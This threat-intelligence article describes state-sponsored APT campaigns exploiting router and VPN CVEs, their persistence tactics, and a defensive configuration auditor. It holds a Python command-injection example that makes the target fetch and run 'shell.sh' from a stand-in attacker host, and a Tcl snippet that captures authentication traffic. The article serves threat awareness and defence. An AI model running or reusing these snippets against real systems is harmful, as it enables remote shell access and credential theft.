
Cybersecurity
Recent analyses have uncovered a systematic campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups targeting vulnerabilities in enterprise-grade routers. These activities have established persistent access within global telecommunications and government networks.
Targeted Vulnerabilities
The APT groups, identified by names such as Salt Typhoon and OPERATOR PANDA, focus on provider edge (PE) and customer edge (CE) devices. They exploit publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain unauthorized access. Notably, CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 in Palo Alto Networks PAN-OS GlobalProtect are commonly targeted.
Exploitation Techniques
These threat actors employ multi-stage attack flows, often beginning with injection into web-facing components and progressing to embedded packet capture. The intrusion typically involves remote code execution through crafted HTTP requests, which grants access to router management interfaces.
After initial access, the attackers target older vulnerabilities such as CVE-2018-0171 in Cisco IOS Smart Install and CVE-2023-20198 in the Cisco IOS XE web management interface. This creates a robust escalation path for persistent access.
Technical Implementation
Cyble analysts have observed the rapid adaptation of public exploit code, often customized as Python or Tcl scripts for specific environments. An example of command injection via a web management interface is as follows:
import requests
url = "https://192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command": "system ('curl http://attacker.com/shell.sh | sh')"}
response = requests.post(url, data=payload, verify=False)
print(response.status_code, response.text)
This method allows remote shell execution, facilitating the deployment of custom tools to extract configuration files, credentials, and session data.
Persistence Tactics
Upon gaining initial access, these groups focus on maintaining long-term presence by modifying Access Control Lists (ACLs) to whitelist attacker IPs and opening non-standard ports for covert access. They leverage Cisco’s Embedded Packet Capture (EPC) functionality to intercept authentication traffic, extracting clear-text credentials.
Scripts, often Tcl-based, are stored in the router’s flash memory to automate these activities. An example script is:
package require json
set capCmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture.pcap
These scripts are executed at boot, creating persistent capture files that are periodically exfiltrated via encrypted GRE tunnels. By altering AAA (Authentication, Authorization, Accounting) configurations, the attackers obfuscate their presence by redirecting logs and disabling alerting mechanisms.
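The persistence patterns described above (boot-time Tcl scripts, Embedded Packet Capture, management ACLs opened to outside addresses, log forwarding redirected, GRE tunnels to unknown endpoints) all leave traces in the router's running configuration. The following is an added defender-side example, not code from the Cyble report: it audits a constructed IOS-style configuration excerpt against assumed baselines of trusted management ranges and log collectors and returns one finding per suspicious line.

```python
import ipaddress
import re

# Constructed sample running-config excerpt. Addresses, interface and capture
# names are illustrative only, not indicators from any real incident.
SAMPLE_CONFIG = """\
aaa new-model
aaa authentication login default group tacacs+ local
scripting tcl init flash:auth_capture.tcl
ip access-list extended MGMT-IN
 permit tcp host 10.0.0.5 any eq 22
 permit tcp host 198.51.100.77 any eq 22
 permit tcp host 10.0.0.5 any eq 443
logging host 10.0.0.9
logging host 203.0.113.14
monitor capture AUTHCAP interface GigabitEthernet0/0 both
monitor capture AUTHCAP start
interface Tunnel7
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.14
 tunnel mode gre ip
"""

# Assumed defender baselines: where management sessions and syslog
# forwarding are expected to come from / go to in this network.
TRUSTED_MGMT = [ipaddress.ip_network("10.0.0.0/24")]
TRUSTED_LOG_HOSTS = {"10.0.0.9"}


def _trusted(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_MGMT)


def audit_config(config: str) -> list[str]:
    """Return one finding string per config line matching a persistence pattern."""
    findings = []
    for line in config.splitlines():
        s = line.strip()
        if s.startswith("scripting tcl init") or (s.startswith("event manager policy") and s.endswith(".tcl")):
            findings.append(f"boot-time Tcl script: {s}")          # scripts run at boot
        elif s.startswith("monitor capture"):
            findings.append(f"embedded packet capture configured: {s}")  # EPC in use
        elif s.startswith("tunnel destination"):
            dst = s.split()[-1]
            if not _trusted(dst):
                findings.append(f"tunnel endpoint outside trusted ranges: {dst}")
        elif s.startswith("logging host"):
            host = s.split()[2]
            if host not in TRUSTED_LOG_HOSTS:
                findings.append(f"log forwarding to unexpected collector: {host}")
        elif s.startswith("permit"):
            m = re.match(r"permit \S+ host (\d+\.\d+\.\d+\.\d+)", s)  # source host only
            if m and not _trusted(m.group(1)):
                findings.append(f"ACL permits management source outside trusted ranges: {m.group(1)}")
    return findings
```

Run it against a saved `show running-config` after adjusting the two baselines; a clean device should produce an empty list, so any finding is worth a manual look.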
This sophisticated approach allows APT groups to sustain a hidden presence in compromised networks for extended periods.